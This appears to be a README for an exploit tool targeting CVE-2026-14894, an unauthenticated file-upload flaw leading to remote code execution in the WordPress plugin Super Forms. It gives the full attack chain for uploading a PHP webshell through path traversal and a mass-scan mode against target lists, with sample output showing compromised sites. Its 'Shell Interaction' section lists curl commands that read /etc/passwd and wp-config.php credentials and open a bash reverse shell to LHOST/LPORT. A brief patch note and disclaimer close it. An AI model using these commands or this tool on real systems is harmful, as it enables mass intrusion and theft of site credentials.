Share
## https://sploitus.com/exploit?id=ED9BCDF7-AF28-577D-BF6D-43E2548BC780
# CVE-2026-14894 โ€” Super Forms โ‰ค 6.3.313


  
  
  
  



  
  
  


---

## Overview

**Unauthenticated Arbitrary File Upload โ†’ Remote Code Execution** in the WordPress plugin [Super Forms](https://wordpress.org/plugins/super-forms/) versions **โ‰ค 6.3.313**.

The vulnerability resides in the AJAX handler `super_submit_form` which processes file uploads through a `datauristring` field without validating the file extension or MIME type before writing to disk. An unauthenticated attacker can upload a PHP webshell and achieve full Remote Code Execution on the target server.

---

## Vulnerability Details

| Field              | Detail                                                          |
|--------------------|-----------------------------------------------------------------|
| **CVE ID**         | CVE-2026-14894                                                  |
| **Plugin**         | Super Forms (WordPress)                                         |
| **Affected**       | โ‰ค 6.3.313                                                       |
| **Patched**        | 6.3.314 (forces `.pdf` extension + `realpath` containment)      |
| **CVSS**           | 9.8 Critical                                                    |
| **Auth Required**  | None                                                            |
| **Researcher**     | andrea bocchetti                                                |
| **AJAX Action**    | `super_submit_form`                                             |
| **Sink**           | `datauristring` field โ†’ `class-ajax.php:2762โ€“2766`              |
| **Upload Path**    | `/wp-content/uploads/superforms/YYYY/MM//`           |

---

## Attack Chain

```
[1] Mint nonce (nopriv)
    POST /wp-admin/admin-ajax.php
    action=super_create_nonce
         โ”‚
         โ–ผ
[2] Upload PHP shell via datauristring (unauthenticated)
    POST /wp-admin/admin-ajax.php
    action=super_submit_form
    data={"sf_upload_field":{"files":[{"datauristring":"data:image/png;base64,..."}]}}
         โ”‚
         โ”œโ”€โ”€ Path Traversal โ†’ /wp-content/themes//shell.php  โ† primary
         โ”‚                                                             (always exec)
         โ”‚
         โ””โ”€โ”€ Random folder โ†’ /wp-content/uploads/superforms/...      โ† fallback
                              (exec depends on server policy)
         โ”‚
         โ–ผ
[3] Shell Discovery
    โ”œโ”€โ”€ S0: media?parent=entry_id  (WP REST)
    โ”œโ”€โ”€ S1: REST /wp/v2/media search (unauth)
    โ”œโ”€โ”€ S2: Apache/nginx directory listing
    โ””โ”€โ”€ S3: WP sitemap attachment XML
         โ”‚
         โ–ผ
[4] RCE โ†’ curl "http://target/wp-content/themes/theme/shell.php?c=id"
```

---

## Requirements

```bash
pip install requests urllib3
```

- Python 3.8+
- Network access to target WordPress site

---

## Usage

### Single Target

```
python cve-2026-14894.py
```

```
  CVE-2026-14894  โ”‚  Super Forms โ‰ค 6.3.313
  Unauthenticated File Upload โ†’ Remote Code Execution
  Researcher: andrea bocchetti  |  PoC: Beelze

  1  Single target
  2  Mass targets (file)

  Mode (1/2): 1

  Target URL               : https://target.com
  Form ID  (enter=auto)    :                      โ† leave blank = auto-discover
  Shell name (enter=random):                      โ† leave blank = random name
  Shell file (enter=built-in):                    โ† leave blank = built-in shell
  WP user  (optional/REST) :                      โ† optional, improves discovery
  WP pass  (optional/REST) :                      โ† optional
```

**Expected output on success:**

```
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  TARGET  https://target.com
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

  Super Forms v6.3.301  vulnerable โ‰ค6.3.313
  [1/3] Mint nonce  ......................  โœ”  OK  a3f9e1c...  sid=sess_ab...
  [2/3] Upload [xkqmhzjt.php]  ..........  โœ”  OK  form_id=42  entry_id=137
  [3/3] Shell discovery  ................  โœ”  FOUND โ†’ RCE [path traversal โ†’ theme]

  โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
  โ•‘  โœ“  PWNED โ†’ RCE CONFIRMED                                   โ•‘
  โ•‘                                                              โ•‘
  โ•‘  Shell  ยป  https://target.com/wp-content/themes/astra/shell โ•‘
  โ•‘  RCE    ยป  uid=33(www-data) gid=33(www-data)                โ•‘
  โ•‘                                                              โ•‘
  โ•‘  $ curl "https://target.com/...shell.php?c=whoami"          โ•‘
  โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
```

---

### Mass Scan

```
  Mode (1/2): 2

  Targets file             : targets.txt     โ† one URL per line, # = comment
  Form ID  (enter=auto)    :
  Threads  (enter=5)       : 10
  Shell file (enter=built-in):
  WP user  (optional/REST) :
  WP pass  (optional/REST) :
```

**targets.txt format:**

```
# Bug bounty scope
https://site1.com
https://site2.com
https://site3.com
```

**Mass scan output:**

```
  โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
  MASS SCAN  3 targets  threads=10
  โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

  [01/03]  https://site1.com  ....  RCE     uid=33(www-data)
           โ†ณ https://site1.com/wp-content/themes/astra/xkqmhzjt.php
  [02/03]  https://site2.com  ....  WRITE   no exec
           โ†ณ https://site2.com/wp-content/uploads/superforms/2026/07/.../shell.php
  [03/03]  https://site3.com  ....  FAIL    plugin inactive / blocked

  โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
  SUMMARY  1 RCE  1 WRITE_ONLY  0 MAYBE  / 3 total
  โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

  RCE SHELLS:
  ยป  https://site1.com/wp-content/themes/astra/xkqmhzjt.php  (uid=33...)
```

---

## Custom Shell

You can supply your own shell file instead of the built-in webshell:

```
  Shell file (enter=built-in): /path/to/myshell.php
```

The tool will upload your file and treat any `200` response with a non-empty body as RCE confirmation.

---

## Shell Interaction

After obtaining RCE, interact with the shell:

```bash
# Command execution
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=id"
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=cat+/etc/passwd"

# Read WordPress config (creds, DB)
curl -sk "https://target.com/.../shell.php?c=cat+/var/www/html/wp-config.php"

# Reverse shell
curl -sk "https://target.com/.../shell.php" --data "c=bash+-c+'bash+-i+>%26+/dev/tcp/LHOST/LPORT+0>%261'"
```

---

## Outputs

Results are automatically saved to:

```
~/Documents/CVE-2026-14894/result_YYYYMMDD_HHMMSS.json
```

---

## Status Codes

| Status          | Meaning                                                             |
|-----------------|---------------------------------------------------------------------|
| `RCE`           | PHP shell confirmed executing โ€” full remote code execution          |
| `WRITE_ONLY`    | File written but PHP not executed (engine off / .htaccess deny)    |
| `POSSIBLE_WRITE`| Upload returned success but shell URL could not be resolved         |
| `FAIL`          | Plugin inactive, nonce failed, or patched version detected          |

---

## Mitigation

Update **Super Forms** to **โ‰ฅ 6.3.314**. The patch enforces `.pdf`-only extension in `datauristring` uploads and adds `realpath()` containment to prevent path traversal.

---

## Disclaimer

> This tool is intended for **authorized penetration testing**, **bug bounty research**, and **educational purposes only**.  
> Do not use against systems you do not have explicit written permission to test.  
> The author is not responsible for any misuse or damage caused by this tool.

---


  CVE-2026-14894 ยท Super Forms โ‰ค 6.3.313 ยท Unauth File Upload RCE
  Researcher: andrea bocchetti ยท PoC: Beelze